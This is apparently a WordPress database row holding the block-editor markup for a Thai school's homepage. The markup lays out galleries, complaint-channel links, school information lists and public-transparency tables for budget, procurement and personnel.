(499,1,'2024-08-02 14:49:06','2024-08-02 07:49:06','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=337\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table 